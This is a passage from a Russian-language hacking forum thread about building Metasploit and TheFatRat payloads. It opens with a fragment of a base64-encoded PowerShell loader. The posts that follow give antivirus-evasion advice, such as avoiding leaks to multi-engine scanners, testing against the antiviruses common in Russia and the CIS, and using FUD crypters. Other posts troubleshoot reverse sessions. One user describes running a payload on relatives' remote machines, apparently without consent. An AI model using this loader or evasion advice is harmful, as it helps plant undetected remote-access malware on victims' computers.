AbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGgAaABqAGYAIAAkAFgAUgBHACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFgAUgBHACAAJABlACIAOwB9AA=='"
это зашифрованный пэйлод в машинный код в base64 или еще какой нить что бы машина его понимала и чтобы антик не палил и плюс твой айпи не спалили куда твой зверек отстукивается (домой) при его ковырянии! (хотя спецы если займутся то по любому его найдут нетстатом или в шарке)))
 

Inject0r

Well-Known Member
03.09.2016
113
174
#5
Да практически все то же самое, что и в первой статье. ifconfig теперь не надо клацать.
Было бы здорово увидеть дальнейшее использование нагрузки метерпретера. Как закрепиться в системе, как поставить файл в автозагрузку. Подгрузка дополнительных вирусняков, и тп.
На торрентах можно скачать видеокурс по метерпретер от pentestit, там лекция часов на 8, про все это там рассказывается. Подробнее чем там никто не объяснит. Называется "Тестирование на проникновение с использованием Metasploit Framework"
 
Последнее редактирование:

ghostphisher

гарант codeby
ELEET
07.12.2016
1 884
1 982
38
#7
Если по 2 Fudwin делать, то детект 12/38
Есле будем и далее выкладывать на подобные детект ресурсы, будет 38/38.
Самый лучший вариант, да и пожалуй действенный для наших рельностей, это тест на 4 актуальных АВ - АК, ДВ, ЕА, АА. Потому как именно эти 4 продукта получила максимальное распространение на рынке РФ и бывшего СНГ, первые 2 занимают львиную долю коммерческого сектора и гос.структур, остальные мелкий бизнес, все вместе находят себе домик на юзер топах. Еще Панда и Авг есть. Почему я на этом заостряю внимание: давать всяким мульти тулзам на проверку хреново и не верно, основная причина слив, вторая неточность срабатывания. Для потенциальных пользоавтелей-тестеров: точно понимаем какую систему собираемся тестировать ( версию ОС, набор пакетов ( хотя бы примерный ), АВ, который вероятно установлен, можно попробовать 4 основных. Вот тогда будет получен результат близкий к правде.
Был загружен файл на проверку на один из онлайн сервисов, где напротив продукта на первую букву Е - стояла зеленая галочка, грузанули файл на комп - Е поднял панику. Вывод - возможно заторомженное обновление БД. Тестируя на своей железке Вы сами следите за обновлениями системы и можете более точно моделировать ситуацию.
 
Последнее редактирование:
11.11.2016
9
2
26
#8
Есле будем и далее выкладывать на подобные детект ресурсы, будет 38/38.
Самый лучший вариант, да и пожалуй действенный для наших рельностей, это тест на 4 актуальных АВ - АК, ДВ, ЕА, АА. Потому как именно эти 4 продукта получила максимальное распространение на рынке РФ и бывшего СНГ, первые 2 занимают львиную долю коммерческого сектора и гос.структур, остальные мелкий бизнес, все вместе находят себе домик на юзер топах. Еще Панда и Авг есть. Почему я на этом заостряю внимание: давать всяким мульти тулзам на проверку хреново и не верно, основная причина слив, вторая неточность срабатывания. Для потенциальных пользоавтелей-тестеров: точно понимаем какую систему собираемся тестировать ( версию ОС, набор пакетов ( хотя бы примерный ), АВ, который вероятно установлен, можно попробовать 4 основных. Вот тогда будет получен результат близкий к правде.
Был загружен файл на проверку на один из онлайн сервисов, где напротив продукта на первую букву Е - стояла зеленая галочка, грузанули файл на комп - Е поднял панику. Вывод - возможно заторомженное обновление БД. Тестируя на своей железке Вы сами следите за обновлениями системы и можете более точно моделировать ситуацию.
На какие подобные? Платные и не сливающие?
 
К тому же, если файл не FUD, то даже если и стоит антивирус и не детектит, то браузер все равно палит. Если FUD, то не палит
 
Крипторы знакомые все им пользуются спокойно и никто не жаловался. Мозги есть слава богу у меня
 

Ondrik8

prodigy
Red Team
08.11.2016
746
1 939
#9
related:virustotal.com поиск похожих сайтов related:<<<<этой командой мы говорим гуглу "найдика мне дружок похожие сайты по тематике!"

и к Ваше взору представится много сайтов и сервисов для проверки Ваших извояний!))

это Магия)
 
Последнее редактирование:

jsat

Active Member
20.04.2017
43
4
32
#10
Безымянный.jpg
Почему интернет не видеть не понимаю, хотя когда клонировал TheFatrat все нормально. Kali стоит в виртуалке, через WIndows 3G USB modem. Может кто знает как исправить ситуацию...
 
20.06.2017
10
3
22
#11
Посмотреть вложение 10932
Почему интернет не видеть не понимаю, хотя когда клонировал TheFatrat все нормально. Kali стоит в виртуалке, через WIndows 3G USB modem. Может кто знает как исправить ситуацию...
анонимайзер если включен, возможно он и мешает!!!
 

OneDollar

Well-Known Member
Red Team
07.09.2017
197
215
32
#12
Товарищи, что может быть ? Не могу создать не exe, не андроид рат. Одна и та же ошибка.. metasploit v4.16.2-dev
 

Вложения

ghostphisher

гарант codeby
ELEET
07.12.2016
1 884
1 982
38
#13
Пробуем писать расширение для файла. Если андроид то aaa.apk <--- APK
 

ghostphisher

гарант codeby
ELEET
07.12.2016
1 884
1 982
38
#15
Попробуй переставить - это удали, слей с гитхаба и ставь согласно инструкции.
 

mz111

Member
20.08.2017
18
10
39
#16
TheFatRat работает,нагрузку запускал на виртуалке (Kali тоже на виртуалке) -всё отлично срабатывало но "в боевых условиях" (запускал на 2-х удалённых машинах,на одной Win XP на другой 7 ничего не получается..И bat и exe запускаются но сессии нет.При создании,в TheFatRat пробовал указывать и внутренний(ifconfig) и внешний ip(как я понимаю я за NAT),bind и reverse пэйлоады но безуспешно.Пожалуйста,подскажите - что не так ??
 

ghostphisher

гарант codeby
ELEET
07.12.2016
1 884
1 982
38
#18
сессии нет.При создании,в TheFatRat пробовал указывать и внутренний(ifconfig) и внешний ip(как я понимаю я за NAT),bind и reverse пэйлоады но безуспешно.Пожалуйста,подскажите - что не так ??
1) Опиши свой сетевой путь - от своего рабочего места до систему которую тестируешь
2) Гуглим - проброс портов + название твоего роутера ( если он есть ), если дело в NAT - тоже самое
 
Симпатии: Понравилось mz111

mz111

Member
20.08.2017
18
10
39
#19
Опиши свой сетевой путь - от своего рабочего места до систему которую тестируешь
Kali установлена на виртуальной машине которая на основной ОС -Win 7.В настройках вирт.машины тип подключения - NAT.Роутера у меня нет,инет по кабелю(оптоволокно).Машина на которой запускал нагрузку( комп родственников) в нашем городе,на ней Win XP,подсоединена к инету так же как и моя.Как я понимаю - я за NATом(ip на том же 2ip определяются другие чем в ipconfig и ifconfig в Kali и Windows)
 
Гуглим - проброс портов + название твоего роутера ( если он есть ), если дело в NAT - тоже самое
Спасибо,буду разбираться.
 
палиться почти всеми антивирусами TheFatRat
Позавчера запускал батник на своей основной ОС ,Касперский фри (обновляется каждый день) не среагировал вообще,и на другом компе нортон секьюрити тоже не пикнул))